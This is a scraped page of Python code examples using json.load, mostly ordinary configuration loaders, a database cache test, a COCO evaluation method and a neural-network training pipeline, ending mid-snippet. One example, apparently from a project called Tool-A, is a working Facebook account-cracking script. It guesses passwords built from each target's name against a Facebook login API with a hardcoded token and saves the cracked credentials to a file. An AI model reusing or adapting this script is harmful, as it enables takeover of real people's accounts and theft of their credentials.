                                 "ogusa_user_modifiable.json")
    with open(usermods_path, "r") as f:
         ump = json.load(f)
         USER_MODIFIABLE_PARAMS = ump["USER_MODIFIABLE_PARAMS"]

    # Read ogusa parameters list from file
    ogusa_params_path = os.path.join(os.path.split(__file__)[0],
                                 "ogusa_parameters.json")
    with open(ogusa_params_path, "r") as f:
         OGUSA_PARAMS = json.load(f)

    params = {k:inputs[k] for k in USER_MODIFIABLE_PARAMS}

    for k, v in params.items():
        if v == '':
            params[k] = str(OGUSA_PARAMS[k]['value'])

    return params
Code example #28
  def test_cache_invalidation(self):
    utils.debug("===========test_cache_invalidation=========")
    master_position = utils.mysql_query(62344, 'vt_test_keyspace', 'show master status')
    #The sleep is needed here, so the invalidator can catch up and the number can be tested.
    replica_tablet.mquery('vt_test_keyspace', "select MASTER_POS_WAIT('%s', %d)" % (master_position[0][0], master_position[0][1]), 5)
    time.sleep(5)
    invalidations = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['Totals']['Invalidations']
    invalidatorStats = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/vars" % replica_host)))['CacheInvalidationProcessor']
    utils.debug("Invalidations %d InvalidatorStats %s" % (invalidations, invalidatorStats))
    self.assertTrue(invalidations > 0, "Invalidations are flowing through.")

    res = replica_tablet.mquery('vt_test_keyspace', "select min(id) from vt_insert_test")
    self.assertNotEqual(res[0][0], None, "Cannot proceed, no rows in vt_insert_test")
    id = int(res[0][0])
    stats_dict = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['vt_insert_test']
    utils.debug("vt_insert_test stats %s" % stats_dict)
    misses = stats_dict['Misses']
    hits = stats_dict["Hits"]
    replica_tablet.vquery("select * from vt_insert_test where id=%d" % (id), path='test_keyspace/0')
    stats_dict = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['vt_insert_test']
    self.assertEqual(stats_dict['Misses'] - misses, 1, "This shouldn't have hit the cache")

    replica_tablet.vquery("select * from vt_insert_test where id=%d" % (id), path='test_keyspace/0')
    stats_dict = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['vt_insert_test']
    self.assertEqual(stats_dict['Hits'] - hits, 1, "This should have hit the cache")
Code example #29
def read_attrs(glider_config_path, glider_name):
    # Load in configurations
    attrs = {}

    # Load institute global attributes
    global_attrs_path = (
        os.path.join(glider_config_path, "global_attributes.json")
    )
    with open(global_attrs_path, 'r') as f:
        attrs['global'] = json.load(f)

    # Load deployment attributes (including global attributes)
    deployment_attrs_path = (
        os.path.join(glider_config_path, glider_name,
                     "deployment.json")
    )
    with open(deployment_attrs_path, 'r') as f:
        attrs['deployment'] = json.load(f)

    # Load instruments
    instruments_attrs_path = (
        os.path.join(glider_config_path, glider_name,
                     "instruments.json")
    )
    with open(instruments_attrs_path, 'r') as f:
        attrs['instruments'] = json.load(f)

    # Fill in global attributes
    attrs['global'].update(attrs['deployment']['global_attributes'])

    return attrs
Code example #30
File: tools.py Project: CatherineH/proselint
def load_options():
    """Read various proselintrc files, allowing user overrides."""
    possible_defaults = (
        '/etc/proselintrc',
        os.path.join(proselint_path, '.proselintrc'),
    )
    options = {}
    has_overrides = False

    for filename in possible_defaults:
        try:
            options = json.load(open(filename))
            break
        except IOError:
            pass

    try:
        user_options = json.load(open(os.path.expanduser('~/.proselintrc')))
        has_overrides = True
    except IOError:
        pass

    if has_overrides:
        if 'max_errors' in user_options:
            options['max_errors'] = user_options['max_errors']
        if 'checks' in user_options:
            for (key, value) in user_options['checks'].items():
                try:
                    options['checks'][key] = value
                except KeyError:
                    pass

    return options
Code example #31
File: V2.py Project: Asim02/Tool-A
	def main(arg):
		global cekpoint,oks
		user = arg
		try:
			os.mkdir('out')
		except OSError:
			pass #Dev:Asim_Ch
		try:													
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)												
			b = json.loads(a.text)												
			pass1 = b['first_name'] + b['last_name']												
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")												
			q = json.load(data)												
			if 'access_token' in q:												
				print '\x1b[1;91m[  ✓  ] \x1b[1;91mHack100%💉'											
				print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m    : \x1b[1;91m' + b['name']											
				print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m      : \x1b[1;91m' + user											
				print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass1 + '\n'											
				oks.append(user+pass1)											
			else:												
				if 'www.facebook.com' in q["error_msg"]:											
					print '\x1b[1;95m[  ✖ ] \x1b[1;95mCeckpoint'										
					print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m    : \x1b[1;95m' + b['name']										
					print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m      : \x1b[1;95m' + user										
					print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass1 + '\n'										
					cek = open("out/super_cp.txt", "a")										
					cek.write("ID:" +user+ " Pw:" +pass1+"\n")										
					cek.close()										
					cekpoint.append(user+pass1)										
				else:											
					pass2 = b['last_name']+'123'										
					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")										
					q = json.load(data)										
					if 'access_token' in q:										
						print '\x1b[1;91m[  ✓  ] \x1b[1;91mHack100%💉'								
						print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m    : \x1b[1;91m' + b['name']									
						print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m      : \x1b[1;91m' + user									
						print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass2 + '\n'									
						oks.append(user+pass2)									
					else:										
						if 'www.facebook.com' in q["error_msg"]:									
							print '\x1b[1;95m[  ✖ ] \x1b[1;95mCeckpoint'								
							print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m    : \x1b[1;95m' + b['name']								
							print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m      : \x1b[1;95m' + user								
							print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass2 + '\n'								
							cek = open("out/super_cp.txt", "a")								
							cek.write("ID:" +user+ " Pw:" +pass2+"\n")								
							cek.close()								
							cekpoint.append(user+pass2)								
						else:									
							pass3 = b['first_name']+'786'								
							data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")								
							q = json.load(data)								
							if 'access_token' in q:								
								print '\x1b[1;91m[  ✓  ] \x1b[1;91mHack100%💉'						
								print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m    : \x1b[1;91m' + b['name']							
								print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m      : \x1b[1;91m' + user							
								print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass3 + '\n'							
								oks.append(user+pass3)							
							else:								
								if 'www.facebook.com' in q["error_msg"]:							
									print '\x1b[1;95m[  ✖ ] \x1b[1;95mCeckpoint'						
									print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m    : \x1b[1;95m' + b['name']						
									print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m      : \x1b[1;95m' + user						
									print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass3 + '\n'						
									cek = open("out/super_cp.txt", "a")						
									cek.write("ID:" +user+ " Pw:" +pass3+"\n")						
									cek.close()						
									cekpoint.append(user+pass3)						
								else:							
									pass4 = b['first_name']+'123'						
									data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")						
									q = json.load(data)						
									if 'access_token' in q:						
										print '\x1b[1;91m[  ✓  ] \x1b[1;91mHack100%💉'					
										print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m    : \x1b[1;91m' + b['name']					
										print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m      : \x1b[1;91m' + user					
										print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass4 + '\n'					
										oks.append(user+pass4)					
									else:						
										if 'www.facebook.com' in q["error_msg"]:					
											print '\x1b[1;95m[  ✖ ] \x1b[1;95mCeckpoint'				
											print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m    : \x1b[1;95m' + b['name']				
											print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m      : \x1b[1;95m' + user				
											print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass4 + '\n'				
											cek = open("out/super_cp.txt", "a")				
											cek.write("ID:" +user+ " Pw:" +pass4+"\n")				
											cek.close()				
											cekpoint.append(user+pass4)				
										else:					
															
											pass5 = '786786'				
											data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")				
											q = json.load(data)				
											if 'access_token' in q:				
												print '\x1b[1;91m[  ✓  ] \x1b[1;91mHack100%💉'			
												print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m    : \x1b[1;91m' + b['name']			
												print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m      : \x1b[1;91m' + user			
												print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass5 + '\n'			
												oks.append(user+pass5)			
											else:				
												if 'www.facebook.com' in q["error_msg"]:			
													print '\x1b[1;95m[  ✖ ] \x1b[1;95mCeckpoint'		
													print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m    : \x1b[1;95m' + b['name']		
													print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m      : \x1b[1;95m' + user		
													print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass5 + '\n'		
													cek = open("out/super_cp.txt", "a")		
													cek.write("ID:" +user+ " Pw:" +pass5+"\n")		
													cek.close()		
													cekpoint.append(user+pass5)		
												else:			
													pass6 = 'Pakistan'		
													data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")		
													q = json.load(data)		
													if 'access_token' in q:		
														print '\x1b[1;91m[  ✓  ] \x1b[1;91mHack100%💉'	
														print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m    : \x1b[1;91m' + b['name']	
														print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m      : \x1b[1;91m' + user	
														print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass6 + '\n'	
														oks.append(user+pass6)	
													else:		
														if 'www.facebook.com' in q["error_msg"]:	
															print '\x1b[1;95m[  ✖ ] \x1b[1;95mCeckpoint'
															print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m    : \x1b[1;95m' + b['name']
															print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m      : \x1b[1;95m' + user
															print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass6 + '\n'
															cek = open("out/super_cp.txt", "a")
															cek.write("ID:" +user+ " Pw:" +pass6+"\n")
															cek.close()
															cekpoint.append(user+pass6)

																	
															
		except:
			pass
Code example #32
File: coco.py Project: LeeJinSoo-BIN/2020.RCVWS
    def loadRes(self, resFile):
        """
        Load result file and return a result api object.
        :param   resFile (str)     : file name of result file
        :return: res (obj)         : result api object
        """
        res = COCO()
        res.dataset['images'] = [img for img in self.dataset['images']]

        print('Loading and preparing results...')
        tic = time.time()
        if type(resFile) == str or type(resFile) == unicode:
            anns = json.load(open(resFile))
        elif type(resFile) == np.ndarray:
            anns = self.loadNumpyAnnotations(resFile)
        else:
            anns = resFile
        assert type(anns) == list, 'results in not an array of objects'
        annsImgIds = [ann['image_id'] for ann in anns]

        assert set(annsImgIds) == (set(annsImgIds) & set(self.getImgIds())), \
               'Results do not correspond to current coco set'
        if 'caption' in anns[0]:
            imgIds = set([img['id'] for img in res.dataset['images']]) & set([ann['image_id'] for ann in anns])
            res.dataset['images'] = [img for img in res.dataset['images'] if img['id'] in imgIds]
            for id, ann in enumerate(anns):
                ann['id'] = id+1
        elif 'bbox' in anns[0] and not anns[0]['bbox'] == []:
            res.dataset['categories'] = copy.deepcopy(self.dataset['categories'])
            for id, ann in enumerate(anns):
                bb = ann['bbox']
                x1, x2, y1, y2 = [bb[0], bb[0]+bb[2], bb[1], bb[1]+bb[3]]
                if not 'segmentation' in ann:
                    ann['segmentation'] = [[x1, y1, x1, y2, x2, y2, x2, y1]]
                ann['area'] = bb[2]*bb[3]
                ann['height'] = bb[3]
                ann['id'] = id+1
                ann['iscrowd'] = 0
        elif 'segmentation' in anns[0]:
            res.dataset['categories'] = copy.deepcopy(self.dataset['categories'])
            for id, ann in enumerate(anns):
                # now only support compressed RLE format as segmentation results
                ann['area'] = maskUtils.area(ann['segmentation'])
                if not 'bbox' in ann:
                    ann['bbox'] = maskUtils.toBbox(ann['segmentation'])
                ann['id'] = id+1
                ann['iscrowd'] = 0
        elif 'keypoints' in anns[0]:
            res.dataset['categories'] = copy.deepcopy(self.dataset['categories'])
            for id, ann in enumerate(anns):
                s = ann['keypoints']
                x = s[0::3]
                y = s[1::3]
                x0,x1,y0,y1 = np.min(x), np.max(x), np.min(y), np.max(y)
                ann['area'] = (x1-x0)*(y1-y0)
                ann['id'] = id + 1
                ann['bbox'] = [x0,y0,x1-x0,y1-y0]
        print('DONE (t={:0.2f}s)'.format(time.time()- tic))

        res.dataset['annotations'] = anns
        res.createIndex()
        return res
Code example #33
import os
import json

import sys
from utils import dict_product, iwt, generate_configs

with open("../src/MuJoCo.json") as f:
    BASE_CONFIG = json.load(f)

PARAMS = {
    "game": ["HalfCheetah-v2"],
    "mode": ["adv_ppo"],
    "out_dir": ["attack_lstm_atla_ppo_halfcheetah/agents"],
    "norm_rewards": ["returns"],
    "initialization": ["orthogonal"],
    "anneal_lr": [True, False],
    "ppo_lr_adam":
    [0.0],  # this disables policy learning and we run attacks only.
    "adv_clip_eps": [0.2, 0.4],
    "adv_entropy_coeff": [0.0, 1e-5, 3e-5, 1e-4, 3e-4, 1e-3],
    "adv_ppo_lr_adam": [1e-3, 3e-3, 1e-2],
    "adv_val_lr": [1e-4, 3e-4, 1e-3],
    "save_iters": [20],
    "train_steps": [488],
    "robust_ppo_eps": [0.15],  # used for attack
    "history_length": [100],
    "load_model": [
        "models/atla_release/ATLA-LSTM-PPO/model-lstm-atla-ppo-ppo-halfcheetah.model"
    ],  # models for attack
    "value_clipping": [True],
}
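
`dict_product` and `generate_configs` are imported from the local `utils` module and are not shown. Assuming `dict_product` expands PARAMS into the Cartesian product of all the option lists, an equivalent stand-in would be:

import itertools

def dict_product(params):
    # Yield one dict per combination of the listed option values.
    keys = list(params.keys())
    for values in itertools.product(*(params[k] for k in keys)):
        yield dict(zip(keys, values))

configs = [{**BASE_CONFIG, **combo} for combo in dict_product(PARAMS)]  # one run config per combination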
Code example #34
import datetime
import json
import sys
from pathlib import Path

import numpy as np

ID = 'P'
date = '5_17_2019'
overwriteFlag = 1

date_obj = datetime.date.today()
date_str = "%s_%s_%s" % (date_obj.month, date_obj.day, date_obj.year)

table = "PreProcessingTable_{}_{}.json".format(ID, date)
TasksDir = Path.cwd() / 'TasksDir'
if not TasksDir.exists():
    sys.exit('Task directory not found.')

if (TasksDir / table).exists():
    with open(str(TasksDir / table), 'r') as f:
        task_table = json.load(f)

nJobs = len(task_table)
completed_table = "PreProcessingTable_{}_{}_Completed.json".format(ID, date)
if not (TasksDir / completed_table).exists() or overwriteFlag:
    table_c = {}
    jobs = np.arange(1, nJobs + 1)
    for t in jobs:
        table_c[str(t)] = 0
    table_c['table'] = table
    table_c['updated'] = date_str

    with open(str(TasksDir / completed_table), 'w') as f:
        json.dump(table_c, f, indent=4)
else:
    with open(str(TasksDir / completed_table), 'r') as f:
Code example #35
File: train_cell.py Project: lxmwust/CNNectome
def train_until(max_iteration, data_sources, input_shape, output_shape, dt_scaling_factor, loss_name):
    ArrayKey('RAW')
    ArrayKey('RAW_UP')
    ArrayKey('ALPHA_MASK')
    ArrayKey('GT_LABELS')
    ArrayKey('MASK')
    ArrayKey('MASK_UP')
    ArrayKey('GT_DIST_CENTROSOME')
    ArrayKey('GT_DIST_GOLGI')
    ArrayKey('GT_DIST_GOLGI_MEM')
    ArrayKey('GT_DIST_ER')
    ArrayKey('GT_DIST_ER_MEM')
    ArrayKey('GT_DIST_MVB')
    ArrayKey('GT_DIST_MVB_MEM')
    ArrayKey('GT_DIST_MITO')
    ArrayKey('GT_DIST_MITO_MEM')
    ArrayKey('GT_DIST_LYSOSOME')
    ArrayKey('GT_DIST_LYSOSOME_MEM')

    ArrayKey('PRED_DIST_CENTROSOME')
    ArrayKey('PRED_DIST_GOLGI')
    ArrayKey('PRED_DIST_GOLGI_MEM')
    ArrayKey('PRED_DIST_ER')
    ArrayKey('PRED_DIST_ER_MEM')
    ArrayKey('PRED_DIST_MVB')
    ArrayKey('PRED_DIST_MVB_MEM')
    ArrayKey('PRED_DIST_MITO')
    ArrayKey('PRED_DIST_MITO_MEM')
    ArrayKey('PRED_DIST_LYSOSOME')
    ArrayKey('PRED_DIST_LYSOSOME_MEM')

    ArrayKey('SCALE_CENTROSOME')
    ArrayKey('SCALE_GOLGI')
    ArrayKey('SCALE_GOLGI_MEM')
    ArrayKey('SCALE_ER')
    ArrayKey('SCALE_ER_MEM')
    ArrayKey('SCALE_MVB')
    ArrayKey('SCALE_MVB_MEM')
    ArrayKey('SCALE_MITO')
    ArrayKey('SCALE_MITO_MEM')
    ArrayKey('SCALE_LYSOSOME')
    ArrayKey('SCALE_LYSOSOME_MEM')

    data_providers = []
    data_dir = "/groups/saalfeld/saalfeldlab/larissa/data/cell/{0:}.n5"
    voxel_size_up = Coordinate((4, 4, 4))
    voxel_size_orig = Coordinate((8, 8, 8))
    input_size = Coordinate(input_shape) * voxel_size_orig
    output_size = Coordinate(output_shape) * voxel_size_orig

    if tf.train.latest_checkpoint('.'):
        trained_until = int(tf.train.latest_checkpoint('.').split('_')[-1])
        print('Resuming training from', trained_until)
    else:
        trained_until = 0
        print('Starting fresh training')
    for src in data_sources:
        n5_source = N5Source(
            os.path.join(data_dir.format(src)),
            datasets={
                ArrayKeys.RAW_UP: 'volumes/raw',
                ArrayKeys.GT_LABELS: 'volumes/labels/all',
                ArrayKeys.MASK_UP: 'volumes/mask'
            },
            array_specs={
                ArrayKeys.MASK_UP: ArraySpec(interpolatable=False)
            }
        )
        data_providers.append(n5_source)

    with open('net_io_names.json', 'r') as f:
        net_io_names = json.load(f)


    # specify which arrays should be requested for each batch
    request = BatchRequest()
    request.add(ArrayKeys.RAW, input_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.RAW_UP, input_size, voxel_size=voxel_size_up)
    request.add(ArrayKeys.GT_LABELS, output_size,  voxel_size=voxel_size_up)
    request.add(ArrayKeys.MASK_UP, output_size, voxel_size=voxel_size_up)
    request.add(ArrayKeys.MASK, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_CENTROSOME, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_GOLGI, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_GOLGI_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_ER, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_ER_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_MVB, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_MVB_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_MITO, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_MITO_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_LYSOSOME, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_LYSOSOME_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.SCALE_CENTROSOME, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.SCALE_GOLGI, output_size, voxel_size=voxel_size_orig)
    #request.add(ArrayKeys.SCALE_GOLGI_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.SCALE_ER, output_size, voxel_size=voxel_size_orig)
    #request.add(ArrayKeys.SCALE_ER_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.SCALE_MVB, output_size, voxel_size=voxel_size_orig)
    #request.add(ArrayKeys.SCALE_MVB_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.SCALE_MITO, output_size, voxel_size=voxel_size_orig)
    #request.add(ArrayKeys.SCALE_MITO_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.SCALE_LYSOSOME, output_size, voxel_size=voxel_size_orig)
    #request.add(ArrayKeys.SCALE_LYSOSOME_MEM, output_size, voxel_size=voxel_size_orig)


    # create a tuple of data sources, one for each N5 container
    data_sources = tuple(
        provider +
        Normalize(ArrayKeys.RAW_UP) +  # ensures RAW_UP is float in [0, 1]

        # zero-pad provided RAW and MASK to be able to draw batches close to
        # the boundary of the available data
        # size more or less irrelevant as followed by Reject Node
        Pad(ArrayKeys.RAW_UP, None) +
        RandomLocation(min_masked=0.5, mask=ArrayKeys.MASK_UP)  # choose a random location inside the provided arrays
        #Reject(ArrayKeys.MASK)  # reject batches which contain less than 50% labelled data

        for provider in data_providers)

    snapshot_request = BatchRequest()
    snapshot_request.add(ArrayKeys.PRED_DIST_CENTROSOME, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_GOLGI, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_GOLGI_MEM, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_ER, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_ER_MEM, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_MVB, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_MVB_MEM, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_MITO, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_MITO_MEM, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_LYSOSOME, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_LYSOSOME_MEM, output_size)
    train_pipeline = (
        data_sources +
        RandomProvider() +
        ElasticAugment((100, 100, 100), (10., 10., 10.), (0, math.pi/2.0),
                       prob_slip=0, prob_shift=0, max_misalign=0,
                       subsample=8) +
        SimpleAugment() +
        ElasticAugment((40, 1000, 1000), (10., 0., 0.), (0, 0), subsample=8) +
        IntensityAugment(ArrayKeys.RAW_UP, 0.9, 1.1, -0.1, 0.1) +
        IntensityScaleShift(ArrayKeys.RAW_UP, 2, -1) +
        ZeroOutConstSections(ArrayKeys.RAW_UP) +

        #GrowBoundary(steps=1) +
        #SplitAndRenumberSegmentationLabels() +
        #AddGtAffinities(malis.mknhood3d()) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_CENTROSOME,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=1, factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_GOLGI,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=(2, 11), factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_GOLGI_MEM,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=11, factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_ER,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=(3, 10), factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_ER_MEM,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=10, factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_MVB,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=(4, 9), factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_MVB_MEM,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=9, factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_MITO,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=(5, 8), factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_MITO_MEM,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=8, factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_LYSOSOME,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=(6, 7), factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_LYSOSOME_MEM,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=7, factor=2
                    ) +
        DownSample(ArrayKeys.MASK_UP, 2, ArrayKeys.MASK) +

        BalanceByThreshold(ArrayKeys.GT_DIST_CENTROSOME, ArrayKeys.SCALE_CENTROSOME, mask=ArrayKeys.MASK) +
        BalanceByThreshold(ArrayKeys.GT_DIST_GOLGI, ArrayKeys.SCALE_GOLGI, mask=ArrayKeys.MASK) +
        #BalanceByThreshold(ArrayKeys.GT_DIST_GOLGI_MEM, ArrayKeys.SCALE_GOLGI_MEM, mask=ArrayKeys.MASK) +
        BalanceByThreshold(ArrayKeys.GT_DIST_ER, ArrayKeys.SCALE_ER, mask=ArrayKeys.MASK) +
        #BalanceByThreshold(ArrayKeys.GT_DIST_ER_MEM, ArrayKeys.SCALE_ER_MEM, mask=ArrayKeys.MASK) +
        BalanceByThreshold(ArrayKeys.GT_DIST_MVB, ArrayKeys.SCALE_MVB, mask=ArrayKeys.MASK) +
        #BalanceByThreshold(ArrayKeys.GT_DIST_MVB_MEM, ArrayKeys.SCALE_MVB_MEM, mask=ArrayKeys.MASK) +
        BalanceByThreshold(ArrayKeys.GT_DIST_MITO, ArrayKeys.SCALE_MITO, mask=ArrayKeys.MASK) +
        #BalanceByThreshold(ArrayKeys.GT_DIST_MITO_MEM, ArrayKeys.SCALE_MITO_MEM, mask=ArrayKeys.MASK) +
        BalanceByThreshold(ArrayKeys.GT_DIST_LYSOSOME, ArrayKeys.SCALE_LYSOSOME, mask=ArrayKeys.MASK) +
        #BalanceByThreshold(ArrayKeys.GT_DIST_LYSOSOME_MEM, ArrayKeys.SCALE_LYSOSOME_MEM, mask=ArrayKeys.MASK) +

        #BalanceByThreshold(
        #    labels=ArrayKeys.GT_DIST,
        #    scales= ArrayKeys.GT_SCALE) +
          #{
            #     ArrayKeys.GT_AFFINITIES: ArrayKeys.GT_SCALE
            # },
            # {
            #     ArrayKeys.GT_AFFINITIES: ArrayKeys.MASK
            # }) +
        DownSample(ArrayKeys.RAW_UP, 2, ArrayKeys.RAW) +
        PreCache(
            cache_size=40,
            num_workers=10)+

        Train(
            'build',
            optimizer=net_io_names['optimizer'],
            loss=net_io_names[loss_name],
            inputs={
                net_io_names['raw']: ArrayKeys.RAW,
